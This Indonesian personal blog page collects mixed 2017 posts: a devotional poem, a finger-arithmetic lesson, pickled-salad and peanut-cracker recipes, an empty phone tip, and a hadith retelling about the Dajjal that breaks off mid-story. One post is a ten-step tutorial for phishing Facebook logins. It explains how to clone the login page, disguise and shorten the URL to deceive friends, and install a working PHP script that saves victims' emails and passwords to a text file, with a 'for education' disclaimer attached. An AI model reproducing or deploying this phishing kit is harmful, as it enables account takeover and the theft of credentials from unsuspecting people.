**

Monday, November 20, 2017

Rizkymu Tahu Dimana Dirimu

(Embun Pagi Blogger) Kau tak tahu dimana rizkymu, tapi rizkymu tahu dimana dirimu
Dari lautan biru, bumi dan gunung, Allah memerintahkannya menjemputmu
Allah menjamin rizkymu sejak 4 bulan 10 hari didalam kandungan,
Amatlah keliru jika rizky dimaknai dari hasil kerja,
Karena bekerja adalah ibadah, sedangkan rizky adalah urusan-Nya.

Melalaikan kebenaran demi mengkhawatirkan apa yg dijamin-Nya, adalah kekeliruan berganda
Manusia membanting tulang demi angka gaji, yg mungkin esok ditinggal mati
Mereka lupa bahwa hakekat rizky bukanlah yg tertulis dlm angka,
Tetapi apa yg telah dinikmati
Rizky tak selalu ada pada pekerjaan kita
Allah menaruh sekehendak-Nya,
Diulang bolak-balik 7x antara sofa dan marwa, tapi zam-zam malah muncul didekat kaki bayinya
Ikhtiar itu perbuatan, rizky itu kejutan
Dan janganlah lupa, tiap rizky itu akan ditanya,:
"Dari mana dan untuk apa?"

Karena rizky adalah hak pakai, halalnya dihisab dan haramnya diazab
Maka janganlah iri pada rizky orang lain
Bila kau iri pada orang lain, kau juga harus iri pada takdir matinya
Karena Allah telah membagi rizky, jodoh dan dan usia, 
tanpa bisa tertukar satu dengan lainnya  
Jadi bertaqwalah, ridho dengan ketentuan-Nya
Sehingga apapun itu, engkau akan merasa cukup dan penuh kenikmatan..

Depok, Nopember 2017

Sumber : anonimous

***

Sunday, November 19, 2017

Rahasia membuka login FB

10 Langkah Hacking Facebook Dengan Menggunakan Teknik Fake Login

 

10 Langkah Hacking Facebook Dengan Menggunakan Teknik Fake Login

facebook login
Oke, sudah lama saya tidak menulis di internet. Kali ini saya mau bagi-bagi ilmu gimana caranya bikin fake login Facebook.
Apa itu fake login? Fake login adalah sebuah interface buatan yang menyerupai suatu website dengan tujuan untuk mengelabuhi target agar email dan sandi yang sifatnya rahasia dapat diketahui. Bagaimana caranya?Ikuti baik-baik tahap yang akan saya berikan.
  1. Koneksi Internet
  2. Masuk ke http://www.facebook.com/login.php/
  3. Klik kanan, pilih save as atau save page as
  4. Lalu anda akan memiliki file yang bernama “Log in Facebook.htm” dan folder berupa kumpulan file yang bernama “Log in   Facebook_Files”
  5. Pada file ”Log in Facebook.htm” klik kanan, open in notepad lalu ganti kode <div><form id=”login_form” action=”https://www.facebook.com/login.php?login_attempt=1″method=”post” menjadi <div><form id=”login_form” action=””next.php method=”post” untuk menemukannya, cukup dengan “ctrl+f”  (find) dan jangan lupa di save
  6. Anda harus memiliki hosting dan domain terlebih dahulu. Jika saya menggunakan 000webhost.com dengan url yang telah diberikan dari 000webhost (lebih detil cari cara bagaimana membuat sebuah web)
  7. Upload file ”Log in Facebook.htm” lalu ganti nama dengan nama apa saja yang anda inginkan namun jangan tertera kata “facebook”
  8. Upload file yang ada di “Log in   Facebook_Files” ke hosting yang sudah kamu buat
  9. Buat php script dengan nama “next.php” dengan notepad, kemudian ganti extention dari .txt menjadi .php (yang harus anda isi akan saya berikan di bawah) kemudian upload ke hosting tempat dimana anda menaruh file dengan extention .htm tadi.
  10. Good Job! sekarang tinggal berikan URL fake login tersebut ke teman anda atau sebarkan secara random dengan embel-embel aplikasi baru atau cara baru login di facebook. Atau jika mau lebih menipu, gunakan URL shortner seperti bit.ly atau tinyurl.
Jika berhasil, maka di tempat dimana anda mengupload file tadi akan tebuat file baru bernama pass.txt yang berisikan email dan password si target. Ini dia fake user interface yang telah saya buat http://facesbook.site11.com/New%20Log%20In.htm
script next.php
<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
ATTETION: Artikel ini hanya bersifat edukasi, nilai yang didapat adalah jangan sekali-kali login dari url selain facebook.com. Sorry for no picture buat tutorialnya. Salam.
***

Friday, November 17, 2017

Jarimatika Penjumlahan dan Pengurangan

Jarimatika adalah merupakan suatu metode perhitungan matematika menggunakan jari-jari tangan. Metode perhitungan ini selain mudah dan murah juga sangat menyenangkanuntuk diajarkan kepada anak-anak, karena ini dapat diajarkan dengan cara belajar sambil bermain.
Pengenalan matematika kepada anak-anak dengan cara bermain akan membuat pemahaman kepada mereka bahwa matematika itu sangat menyenangkan dan bukan sesuatu matapelajaran yang harus “ditakuti”. Sekolah-sekolah bisa menjadikan ini sebagai jam tambahan bagi para siswa untuk belajar seperti ekstrakulikuler atau bimbingan belajar.
Baiklah, untuk tahap awal yaitu perkenalkan angka-angka menggunakan jari-jari tangan.
  • Jari Tangan Kanan sebagai SATUAN.
  • Jari Tangan Kiri sebagai PULUHAN.
Contoh :
Ok, sekarang kita masuk ke materi yaah.
1. Penjumlahan
3 + 4 = 7
cara : Buka jari kanan 3 kemudian buka lagi 4, karena sudah tidak cukup maka untuk memperoleh angka 4 buka jari jempol yang memiliki angka 5. Karena jempol memiliki angka 5 maka tutup/kurang satu jari untuk mendapatkan 4.
9 + 3 = 12
cara : Buka jari kanan 9 kemudian buka lagi 3, karena jari kiri sudah tidak cukup maka untuk memperoleh angka 3 buka jari kiri satu yang memiliki angka 10. Karena satu jari kiri memiliki angka 10 maka tutup/kurang tujuh jari kanan untuk mendapatkan 3.
8 + 7 = 15
cara : Buka jari kanan 8 kemudian buka lagi 7, karena jari kiri sudah tidak cukup maka untuk memperoleh angka 7 buka jari kiri satu yang memiliki angka 10. Karena satu jari kiri memiliki angka 10 maka tutup/kurang tiga jari kanan untuk mendapatkan 7.
27 + 9 = 36
cara : Buka jari kiri 2 kemudian buka jari kanan 7 lalu tambah 9, karena jari kiri sudah tidak cukup maka untuk memperoleh angka 9 buka lagi satu jari kiri yang memiliki angka 10. Karena satu jari kiri memiliki angka 10 maka tutup/kurang satu jari kanan untuk mendapatkan 9.
2. Pengurangan
7 – 3 = 4
cara : Buka jari kanan 7 kemudian tutup/kurang 3 dengan cara tutup jempol, karena jempol memiliki angka 5 maka untuk memperoleh 3, tutup jempol lalu buka dua jari kanannya.
24 – 8 = 16
cara : Buka jari kanan 2 dan jari kiri 4 kemudian tutup/kurang 8 dengan cara tutup empat jari kanan, karena masih kurang empat maka tutup lagi satu jari kiri, karena satu jari kiri memiliki angka 10 maka dikurangi empat dan sisa enam, sehingga buka jari kanan 6.
3. Penjumlahan dan Pengurangan
1 + 5 + 2 – 5 = 3
21 + 13 – 2 = 32
21 + 55 = 76
Sekian aja dulu, silahkan ajarkan kepada adik-adik kita dengan cara belajar yang menyenangkan dan itu tinggal cara anda yang mengajarkan.
 INGAT !!
Ilmu yang berguna & bermanfaat adalah ilmu yang dapat membuat orang dari yang tidak tahu menjadi tahu sehingga ilmu itu berkembang luas dan tidak terbatas hanya pada diri kita sendiri, mari berbagi”. (joniqonex)
Sumber:
http://onectro.wordpress.com/2012/
***

Contoh Etalase/Resep Asinan



CARA MEMBUAT ASINAN BUAH THOUGE PEDAS DAN MANIS
Resep mudah membuat asinan ini pasti banyak disukai orang. Dengan rasa segar dari mangga dan ABC SAMBAL MANIS PEDAS membuat rasa asinan ini begitu menempel di lidah dan tak mau hilang. Nikmati dingin asinannya akan lebih nikmat dan mantap untuk menghilangkan kepenatan.

Bahan-bahan:
  • 1.500 ml air
  • ½ sdm ebi diseduh lalu disangrai
  • 30 gr kacang tanah digoreng untuk taburan
  • 150 gr mangga mengkal dipotong-potong
  • 150 gr tauge dibersihkan
Bumbu-bumbu:
  • 12 buah cabai merah keriting dibuang biji
  • 1 sdm cuka
  • 2 sdt garam
  • 250 gr gula pasir
  • 5 sdm ABC SAMBAL MANIS PEDAS
Waktu Persiapan
: 10
Waktu Masak/Pembuatan
: 10
Disajikan untuk
: 6
Cara Membuat :
  1. Untuk kuah, haluskan cabai merah keriting, gula pasir, garam dan ebi. Tambahkan ABC Sambal Manis Pedas kemudian tuangkan air sampai mendidih. Angkat. Tambahkan cuka. Aduk rata.
  2. Masukkan buah-buahan dan tauge.
  3. Sajikan dalam mangkuk dan taburi kacang goring
 


2. ASINAN SAYUR
Bahan:
  • 1/4  kol (iris)
  • 1 buah mentimun (potong dadu kecil)
  • 1/2 tahu cina (potong dadu)
  • 1 wortel (iris korek api)
  • 50 gram tauge
  • 5 lembar daun selada (iris)
  • 100 gram kacang tanah (goreng)
  • 500 ml air matang
  • 3 sdm cuka masak
  • 3 sdm ebi (rendam air dan haluskan)
  • garam dan gula
Haluskan :
  • 8 cabai merah
  • 5 cabai rawit merah
  • garam
Cara membuat:
  1. Campur bumbu halus, cuka, gula, ebi, gula dan garam sampai rata.
  2. Tuangi air, aduk rata.
  3. Masukkan irisan sayuran dan tahu, aduk rata.
  4. Ketika disajikan, taburi dengan kacang tanah goreng.
  5. Yummy!
Selamat mencoba! :D


3.ASINAN KEDONDONG

12 Buah kedondong diiris sesuai selera,
5 Buah cabe rawit
3 Siung bawang putih
½ sdm terasi
Gula secukupnya

CARANYA;
Haluskan semua bumbu lalu rebus pada air seperlunya. Jika sudah matang matikan api
Lalu ceburkan buah kedondong dan dinginkan…

Resep Cara Membuat Asinan Buah Bogor

Bahan :
2 buah kedondong, dipotong-potong
150 gram nanas, dipotong-potong
100 gram bengkuang, dipotong-potong
150 gram mangga mengkel, dipotong-potong
100 gram pepaya mengkel, dipotong-potong
100 gram jambu air merah, dipotong-potong
25 gram kacang tanah goreng untuk taburan
Bahan kuah :
1.000 ml air
5 buah cabai merah keriting, dibuang biji
150 gram gula pasir
1 sendok teh garam
1 sendok teh ebi, diseduh, disangrai
5 1/2 sendok teh cuka
Cara membuat :
1. Remas-remas pepaya dengan 1 sendok teh garam. Biarkan sebentar lalu cuci bersih. Sisihkan.
2. Remas-remas mangga dengan garam lalu rendam dalam air gula ericer semalaman. Keesokan harinya, tiriskan dan cuci bersih. Rendam lagi dalam air gula yang kental semalaman. Lakukan hal yang sama dengan kedondong.
3. Kuah: haluskan cabai merah keriting, gula pasir, garam, dan ebi. Tuang air. Masak sampai mendidih. Angkat. Tambahkan cuka. Aduk rata. Dinginkan.
4. Masukkan buah-buahan. Diamkan 2 jam dalam lemari es.
5. Sajikan dengan taburan kacang tanah goreng.
Selamat Mencoba

 

 

Resep Cara Membuat Asinan Betawi.

Resep Cara Membuat Asinan Betawi. Berikut ini merupakan Resep Cara Membuat Asinan Betawi yang kami kategorikan ke dalam Label Asinan. Silahkan buat para pecinta makanan asinan untuk mempraktekan Resep Cara Membuat Asinan Betawi berikut ini dirumah.



Bahan :
  • 400 gram kol diiris halus.
  • 400 gram wortel diserut kasar.
  • 200 gram taoge.
  • 400 gram daun selada.
Marinade  :
  • 100 gram gula pasir.
  • 2 sendok teh garam.
  • 6 buah cabai merah, dihaluskan.
  • 2 sendok teh cuka.
  • 200 mili air masak.
Bahan untuk saus :
  • 50 gram kacang tanah digoreng sebentar.
  • 25 gram ebi digoreng.
  • 5 buah cabai merah.
  • 50 gram gula pasir.
  • 1 sendok teh garam.
  • 200 mili liter air masak.
 

Cara Membuat Resep Cara Membuat Asinan Betawi :
  1. Semua sayuran, kecuali daun selada, direndam dalam marinade selama sekitar 15 menit,tiriskan, atur dalam piring saji yang dasarnya sudah diberi daun selada.
  2. Saus : Kacang tanah, ebi dan cabai dihaluskan, lalu campur dengan gula pasir,garam dan air masak, sisihkan.
  3. Siram sayuran dengan bahan saus.
  4. Hidangkan dengan kerupuk mi. silahkan :)


Asinan Betawi




Asinan betawi ini berisi Taoge, wortel, mentimun, tahu, kerupuk mi, dan bumbu cuka, kombinasi yang pas untuk santapan di siang hari.

Bahan Asinan Betawi :

200 gr tahu putih
150 gr wortel, parut panjang
150 gr mentimun hijau
150 gr mentimun putih
150 gr lokio (bawang asinan)
4 bh kerupuk mi kuning
150 gr taoge
100 gr kol

Haluskan:

3 siung bawang putih
4 bh bawang merah
3 bh cabai merah, rebus, haluskan
½ sdt terasi
200 ml air
150 gr gula merah
2 sdt cuka
150 gr kacang tanah

Pelengkap :

Kerupuk mi kuning
Kerupuk kanji merah
Kacang tanah goreng

Cara membuat Asinan Betawi :

1. Campurkan semua bahan sayuran, rendam dalam air yang sudah ditambah cuka selama 1 jam, angkat, tiriskan.
2. Haluskan bawang putih, bawang merah, terasi, cabai merah, garam, dan kacang tanah.
3. Buat bumbu cuka : masak air dengan gula merah sampai mendidih, campurkan semua bahan.
4. Cara penyajian : masukkan semua bahan sayuran ke dalam mangkuk, taburi kacang tanah goreng dan kerupuk mi. Siram dengan bumbu cuka.

selamat menikmati



ASINAN BOGOR ASLI
Resep Asinan Bogor asli dengan buah mangga yang enak. Artikel kali ini cara membuat asinan tanpa sayur hanya buah yang masih fresh asli gedung dalam bogor. Makanan khas kota hujan ini sudah terkenal sampai ke kota lain, siapa yang mampir ke sini, blom afdol kalau tidak membawa oleh-oleh masakan segar ini. Jika anda mau bikin dirumah kami sediakan resep asli dari sana.
Asinan Bogor Asli Buah yang terkenal
Bahan Asinan :
  • 250 gram kol, diiris tipis
  • 200 gram sawi asin, diiris halus saja
  • 100 gram pepaya setengah matang, dipotong kotak-kotak
  • 200 gram nanas, diiris tipis, lumuri garam juga
  • 200 gram bengkuang, dipotong kotak-kotak
  • 300 gram wortel, diiris bentuk korek api, lumuri garam dulu
  • 300 gram taoge, akarnya dibuang
  • 100 gram kacang goreng
  • Secukupnya Kerupuk mie
Bumbu kuah Asinan:

5 buah cabe merah, dihaluskan
3 sendok makan ebi, disangrai, lalu haluskan
1/8 sendok teh terasi bakar
3 sendok makan air jeruk lemon
2 sendok makan cuka
50 gram gula pasir
1 sendok teh garam
500 ml air

- Pertama haluskan cabe merah, ebi, terasi, garam dan gula pasir, campurkan air jeruk lemon dan air, masak sampai mendidih.angkat, dinginkan.
Cara membuat Asinan Bogor
  1. - Pertama cuci bersih taoge, kol, wortel, sawi asin, pepaya, nanas, dan bengkuang. lalu sisihkan
  2. - Ambil mangkuk lalu susun potongan kol, wortel, sawi asin, pepaya, nanas, bengkuang dan taoge, kemudian siram kuahnya dan taburi kacang goreng.selesai
Biasanya ditemani dengan kerupuk mi, seger deh nih makanan apalagi kalau dinikmati saat udara panas. memang yang paling enak katanya dari gedung dalam dan ini sudah mendekati mirip, tinggal anda kreasikan tingkat pedasnya saja jika suka. silahkan tes saja Resep Asinan Bogor Asli kami.
 

***

Resep Rempeyek Kacang Tanah Renyah

Resep Rempeyek Kacang Tanah Renyah biasanya dari Jawa. Cara membuat atau bikin Peyek ini ada beberapa bumbu yang harus diolah sehingga gurih dan renyah. biasanya makanan ini adalah teman saat kita makan nasi atau baso, soto, sop dll, karena renyah dan gurih sehingga makan kita terasa enak dan lahap, sangat cocok selalu ada dimeja makan anda. sebenarnya boleh loh diganti sama ikan teri atau udang, jadi resep masakan ini fleksibel saja kok.
resep rempeyek kacang tanah 
Renyah dan Gurih nih Rempeyek Kacang Tanah ( peyek )
Bahan yang diperlukan :
  • 400 gram tepung beras
  • 1/2 sendok makan tepung tapioka
  • 1/2 kg kacang tanah, dikupas dulu
  • 4 butir kemiri
  • 4 siung bawang putih
  • 1 sendok teh ketumbar bubuk
  • 250 cc santan kelapa
  • 100 cc air putih
  • 1 butir telur
  • 1 sendok makan air kapur sirih, (jika mau pakai)
  • 5 lembar daun jeruk, iris tipis (Jika mau pakai)
  • secukupnya garam
  • secukupnya Minyak goreng
Cara Membuat Rempeyek Kacang Tanah Renyah :
  1. - Pertama Ambil wadah dan Masukkan telur, bawang putih, kemiri, ketumbar bubuk, garam, dan air kapur sirih, lalu blender hingga halus.
  2. - Kemudian Campurkan bumbu halus tersebut dengan air, santan, tepung beras, tepung tapioka, kacang tanah, dan daun jeruk. Kemudian aduk sampai merata.
  3. - Panaskan minyak goreng, lalu masukkan adonan tadi sedikit demi sedikit di bagian pinggir sehingga membentuk piringan tipis, diatas api sedang sampai kecoklatan.angkat,tiriskan, selesai.
Bumbu peyek nya memang terasa agak banyak ya, namun terlihat sekali bahwa bumbunya standar yang sudah ada didapur anda sehingga gak sulit untuk membuat makanan cemilan sekaligus teman nasi ini. rempeyek atau peyek ini sangat renyah dan gurih karena ada kacang tanah plus ditambah ada santan didalamnya, rasa kriuk kriuk sebagai pengganti krupuk dirumah, pokoknya enak banget, bisa diganti udang atau ikan teri juga. silahkan coba ya Resep Rempeyek Kacang Tanah kami.

Keterangan :
Waktu Memasak: 40 Menit dan Menghasilkan: 25 Buah ,
Mengandung : 90Kalori
Resep ini mendapatkan : 5 Bintang oleh 21 Resensi
Sumber :
http://resep4.blogspot.com

TUTORIAL PEYEK KACANG HIJAU/KEDELAI









***

Cara Menghemat Baterai Android Yg Unik dan Jarang






                                          Sumber : http://portal.paseban.com

***

Di Pulau Misterius Itu Aku Berjumpa Dajjal

Ada baiknya kita awali kisah ini dengan membahas hakekat Dajjal, karena tidak semua tahu siapa Dajjal, sebagian lagi menyangka Dajjal hanyalah sebuah simbol, atau sesuatu yang tidak berwujud dan tidak memiliki hakekat.

Dajjal adalah sesosok laki-laki dari anak Adam yang memiliki sejumlah sifat sebagaimana disebutkan dalam hadits-hadits shahih. Rasulullah shallallohu’alaihi wasallam banyak menyebutkan Dajjal beserta sifat-sifatnya agar manusia mengetahui dan berhati-hati dari makhluk jelek ini, sehingga apabila kelak ia muncul, kaum mukminin dapat mengenalnya serta tidak terfitnah olehnya.
Bahkan karena besarnya fitnah Dajjal, Rasulullah berwasiat untuk kita selalu berlindung dari kejelekannya di setiap akhir shalat sesudah tasyahhud akhir. Rasulullah bersabda:
إذا فرغ أحدكم من التشهد ( الآخر ) فليستعذ بالله من أربع ( يقول : اللهم إني أعوذ بك ) من عذاب جهنم ومن عذاب القبر ومن فتنة المحيا والممات ومن شر ( فتنة ) المسيح الدجال ( ثم يدعو لنفسه بما بدا له )
Apabila salah seorang diantara kalian selesai dari tasyahud akhir mintalah perlindungan dari empat perkara. Ucapkan: Ya Allah aku berlindung kepada-Mu dari adzab neraka Jahannam, dan dari adzab kubur dan dari fitnah kehidupan dan kematian dan dari kejelekan titnah Al-Masih Ad-Dajjal. Kemudian berdoalah untuk dirinya apa yang tampak baginya (untuk dia minta). (HR. Muslim, Abu ‘Awanah, An-Nasai dan Ibnul Jarud)
Aisyah Ra, mengabarkan bahwa Rasulullah saw selalu berdoa dalam shalat:
اللهم إني أعوذ بك من عذاب القبر وأعوذ بك من فتنة المسيح الدجال وأعوذ بك من فتنة المحيا والممات اللهم إني أعوذ بك من المأثم والمغرم
“Ya Allah, sungguh aku berlindung kepada Mu dari siksa kubur. Dan aku berlindung kepada Mu dari fitnah Al-Masiih Dajjal. Dan aku berlindung kepada Mu dari fitnah ketika hidup dan fitnah setelah mati. Ya Allah, sungguh aku berlindung kepada Mu dari dosa dan hutang.” (Al-Bukhari dan Muslim)
Diantara sifat Dajjal, dia adalah seorang pemuda. Kulitmya merah, berbadan besar, pendek, berambut keriting, dahinya lebar, pundaknya bidang, mata sebelah kanan buta, dan matanya ini tidak menonjol keluar juga tidak tenggelam, seolah-oleh buah anggur yang masak (tak bercahaya) dan matanya sebelah kiri ditumbuhi daging yang tebal pada sudutnya. Di antara kedua matanya terdapat tulisan huruf kaf, fa’, ra’ secara terpisah, atau tulisan “kafir”, yang dapat dibaca oleh setiap muslim yang bisa menulis maupun yang tidak bisa menulis. Dan di antara tandanya lagi ialah mandul, tidak punya anak. Semua sifat-sifat ini disebutkan dalam sabda-sabda Rasulullah shallallohu’alaihi wasallam.
Apakah makhluk ini sudah ada wujudnya? Dimanakah ia sekarang? Kisah Tamim Ad-Dari Ra akan menjawab pertanyaan ini…
Tamim Ad-Dari Shahabat Yang Pernah Berjumpa Dajjal
Namanya Tamim bin Aus bin Kharijah Ad-Dari, Abu Ruqayyah. Beliau salah seorang shahabat rasul yang mulia. Namanya tidak asing bagi kaum muslimin, masuk islam ketika Rasulullah di Madinah. Sepeninggal Khalifah Utsman bin Affan, Tamim meninggalkan kota Madinah dan menetap di Baitul Maqdis hingga meninggal di sana pada tahun 40 H.
Shahabat inilah yang pernah melihat Dajjal dengan kedua matanya. Shahabat ini pulalah yang pernah berbicara dan mendengar pembicaraan Dajjal dengan kedua telinganya. Sebelum islam, Tamim beragama nasrani. Saat dirinya nasrani itulah dia melihat Dajjal. Hingga kemudian Allah lapangkan dadanya untuk menerima islam dan ia beritakan kisahnya kepada Rasulullah saw.
Di Mana Tamim Ad-Dari melihat Dajjal? Bagaimana kisahnya ?
Tiba saatnya kita baca bersama sebuah riwayat shahih mengenai Dajjal dalam sebuah hadits yang dikenal dikalangan ulama dengan sebutan Hadits Jassasah. Hadits ini dikisahkan seorang shahabiyah, Fathimah binti Qois Ra.
‘Amir bin Syarohil Asy-Sya’bi berkata kepada Fathimah bintu Qais: “Kabarkan kepadaku sebuah hadits yang kau dengar dari Rasulullah SAW yang tidak kamu sandarkan kepada seorangpun selain beliau.”
Fathimah mengatakan: “Jika engkau kehendaki akan aku sampaikan.” “Iya berikan aku hadits itu.” jawab Asy Syabi.
Fatimahpun berkisah : “Suatu hari Aku mendengar seruan orang yang berseru. Penyeru Rasulullah saw menyeru: “Ashsholatu jamiah !”
Akupun segera keluar menuju masjid. Aku shalat bersama Rasulullah saw dan aku berada pada shaf wanita yang langsung berada di belakang shaf laki-laki. Tatkala Rasulullah selesai dari shalat, beliau duduk di mimbar dan tertawa seraya mengatakan:
لِيَلْزَمْ كُلُّ إِنْسَانٍ مُصَلَّاهُ
“Hendaknya masing-masing kalian tetap berada di tempat shalatnya !” Lalu beliau bersabda:
أَتَدْرُونَ لِمَ جَمَعْتُكُمْ
“Tahukah kalian, mengapa aku kumpulkan kalian ?”
Para Shahabat menjawab: “Allah dan Rasul-Nya lebih mengetahui!”
Kemudian Rasulullah saw kembali bersabda dengan kisah yang cukup panjang, beliau berkata:
إِنِّي وَاللَّهِ مَا جَمَعْتُكُمْ لِرَغْبَةٍ وَلَا لِرَهْبَةٍ وَلَكِنْ جَمَعْتُكُمْ لِأَنَّ تَمِيمًا الدَّارِيَّ كَانَ رَجُلًا نَصْرَانِيًّا فَجَاءَ فَبَايَعَ وَأَسْلَمَ وَحَدَّثَنِي حَدِيثًا وَافَقَ الَّذِي كُنْتُ أُحَدِّثُكُمْ عَنْ مَسِيحِ الدَّجَّالِ حَدَّثَنِي أَنَّهُ رَكِبَ فِي سَفِينَةٍ بَحْرِيَّةٍ مَعَ ثَلَاثِينَ رَجُلًا مِنْ لَخْمٍ وَجُذَامَ فَلَعِبَ بِهِمْ الْمَوْجُ شَهْرًا فِي الْبَحْرِ ثُمَّ أَرْفَئُوا إِلَى جَزِيرَةٍ فِي الْبَحْرِ حَتَّى مَغْرِبِ الشَّمْسِ فَجَلَسُوا فِي أَقْرُبْ السَّفِينَةِ فَدَخَلُوا الْجَزِيرَةَ فَلَقِيَتْهُمْ دَابَّةٌ أَهْلَبُ كَثِيرُ الشَّعَرِ لَا يَدْرُونَ مَا قُبُلُهُ مِنْ دُبُرِهِ مِنْ كَثْرَةِ الشَّعَرِ فَقَالُوا وَيْلَكِ مَا أَنْتِ فَقَالَتْ أَنَا الْجَسَّاسَةُ قَالُوا وَمَا الْجَسَّاسَةُ قَالَتْ أَيُّهَا الْقَوْمُ انْطَلِقُوا إِلَى هَذَا الرَّجُلِ فِي الدَّيْرِ فَإِنَّهُ إِلَى خَبَرِكُمْ بِالْأَشْوَاقِ قَالَ لَمَّا سَمَّتْ لَنَا رَجُلًا فَرِقْنَا مِنْهَا أَنْ تَكُونَ شَيْطَانَةً قَالَ فَانْطَلَقْنَا سِرَاعًا حَتَّى دَخَلْنَا الدَّيْرَ فَإِذَا فِيهِ أَعْظَمُ إِنْسَانٍ رَأَيْنَاهُ قَطُّ خَلْقًا وَأَشَدُّهُ وِثَاقًا مَجْمُوعَةٌ يَدَاهُ إِلَى عُنُقِهِ مَا بَيْنَ رُكْبَتَيْهِ إِلَى كَعْبَيْهِ بِالْحَدِيدِ قُلْنَا وَيْلَكَ مَا أَنْتَ قَالَ قَدْ قَدَرْتُمْ عَلَى خَبَرِي فَأَخْبِرُونِي مَا أَنْتُمْ قَالُوا نَحْنُ أُنَاسٌ مِنْ الْعَرَبِ رَكِبْنَا فِي سَفِينَةٍ بَحْرِيَّةٍ فَصَادَفْنَا الْبَحْرَ حِينَ اغْتَلَمَ فَلَعِبَ بِنَا الْمَوْجُ شَهْرًا ثُمَّ أَرْفَأْنَا إِلَى جَزِيرَتِكَ هَذِهِ فَجَلَسْنَا فِي أَقْرُبِهَا فَدَخَلْنَا الْجَزِيرَةَ فَلَقِيَتْنَا دَابَّةٌ أَهْلَبُ كَثِيرُ الشَّعَرِ لَا يُدْرَى مَا قُبُلُهُ مِنْ دُبُرِهِ مِنْ كَثْرَةِ الشَّعَرِ فَقُلْنَا وَيْلَكِ مَا أَنْتِ فَقَالَتْ أَنَا الْجَسَّاسَةُ قُلْنَا وَمَا الْجَسَّاسَةُ قَالَتْ اعْمِدُوا إِلَى هَذَا الرَّجُلِ فِي الدَّيْرِ فَإِنَّهُ إِلَى خَبَرِكُمْ بِالْأَشْوَاقِ فَأَقْبَلْنَا إِلَيْكَ سِرَاعًا وَفَزِعْنَا مِنْهَا وَلَمْ نَأْمَنْ أَنْ تَكُونَ شَيْطَانَةً فَقَالَ أَخْبِرُونِي عَنْ نَخْلِ بَيْسَانَ قُلْنَا عَنْ أَيِّ شَأْنِهَا تَسْتَخْبِرُ قَالَ أَسْأَلُكُمْ عَنْ نَخْلِهَا هَلْ يُثْمِرُ قُلْنَا لَهُ نَعَمْ قَالَ أَمَا إِنَّهُ يُوشِكُ أَنْ لَا تُثْمِرَ قَالَ أَخْبِرُونِي عَنْ بُحَيْرَةِ الطَّبَرِيَّةِ قُلْنَا عَنْ أَيِّ شَأْنِهَا تَسْتَخْبِرُ قَالَ هَلْ فِيهَا مَاءٌ قَالُوا هِيَ كَثِيرَةُ الْمَاءِ قَالَ أَمَا إِنَّ مَاءَهَا يُوشِكُ أَنْ يَذْهَبَ قَالَ أَخْبِرُونِي عَنْ عَيْنِ زُغَرَ قَالُوا عَنْ أَيِّ شَأْنِهَا تَسْتَخْبِرُ قَالَ هَلْ فِي الْعَيْنِ مَاءٌ وَهَلْ يَزْرَعُ أَهْلُهَا بِمَاءِ الْعَيْنِ قُلْنَا لَهُ نَعَمْ هِيَ كَثِيرَةُ الْمَاءِ وَأَهْلُهَا يَزْرَعُونَ مِنْ مَائِهَا قَالَ أَخْبِرُونِي عَنْ نَبِيِّ الْأُمِّيِّينَ مَا فَعَلَ قَالُوا قَدْ خَرَجَ مِنْ مَكَّةَ وَنَزَلَ يَثْرِبَ قَالَ أَقَاتَلَهُ الْعَرَبُ قُلْنَا نَعَمْ قَالَ كَيْفَ صَنَعَ بِهِمْ فَأَخْبَرْنَاهُ أَنَّهُ قَدْ ظَهَرَ عَلَى مَنْ يَلِيهِ مِنْ الْعَرَبِ وَأَطَاعُوهُ قَالَ لَهُمْ قَدْ كَانَ ذَلِكَ قُلْنَا نَعَمْ قَالَ أَمَا إِنَّ ذَاكَ خَيْرٌ لَهُمْ أَنْ يُطِيعُوهُ وَإِنِّي مُخْبِرُكُمْ عَنِّي إِنِّي أَنَا الْمَسِيحُ وَإِنِّي أُوشِكُ أَنْ يُؤْذَنَ لِي فِي الْخُرُوجِ فَأَخْرُجَ فَأَسِيرَ فِي الْأَرْضِ فَلَا أَدَعَ قَرْيَةً إِلَّا هَبَطْتُهَا فِي أَرْبَعِينَ لَيْلَةً غَيْرَ مَكَّةَ وَطَيْبَةَ فَهُمَا مُحَرَّمَتَانِ عَلَيَّ كِلْتَاهُمَا كُلَّمَا أَرَدْتُ أَنْ أَدْخُلَ وَاحِدَةً أَوْ وَاحِدًا مِنْهُمَا اسْتَقْبَلَنِي مَلَكٌ بِيَدِهِ السَّيْفُ صَلْتًا يَصُدُّنِي عَنْهَا وَإِنَّ عَلَى كُلِّ نَقْبٍ مِنْهَا مَلَائِكَةً يَحْرُسُونَهَا قَالَتْ قَالَ رَسُولُ اللَّهِ صَلَّى اللَّهُ عَلَيْهِ وَسَلَّمَ وَطَعَنَ بِمِخْصَرَتِهِ فِي الْمِنْبَرِ هَذِهِ طَيْبَةُ هَذِهِ طَيْبَةُ هَذِهِ طَيْبَةُ يَعْنِي الْمَدِينَةَ أَلَا هَلْ كُنْتُ حَدَّثْتُكُمْ ذَلِكَ فَقَالَ النَّاسُ نَعَمْ فَإِنَّهُ أَعْجَبَنِي حَدِيثُ تَمِيمٍ أَنَّهُ وَافَقَ الَّذِي كُنْتُ أُحَدِّثُكُمْ عَنْهُ وَعَنْ الْمَدِينَةِ وَمَكَّةَ
“Sesungguhnya demi Allah, tidaklah aku kumpulkan kalian untuk sesuatu yang menggembirakan atau menakutkan kalian, namun aku kumpulkan kalian karena tamim Addari.”
“Dahulu ia seorang nasrani yang kemudian datang berbaiat (memberikan sumpah setia) dan masuk islam serta mengabariku sebuah kisah yang kisah itu sesuai dengan apa yang pernah aku kisahkan kepada kalian tentang Al-Masih Ad-Dajjal.”
Ia memberitakan bahwa ia naik kapal bersama 30 orang dari kabilah Lakhm dan Judzam. Ditengah perjalanan, mereka dipermainkan badai ombak hingga berada di tengah laut selama satu bulan sampai mereka terdampar di sebuah pulau di tengah lautan tersebut saat tenggelam matahari merekapun duduk di perahu-perahu kecil. Mereka pun memasuki pulau tersebut hingga menjumpai binatang yang berambut sangat lebat dan kaku hingga mereka tidak tahu mana kubul mana dubur karena demikian lebat bulunya.”
Merekapun berkata: “Celaka, kamu ini apa?
ia menjawab: “Aku adalah al-jassasah .”
Merka mengatakan: “Apakah al jasasah itu ?.
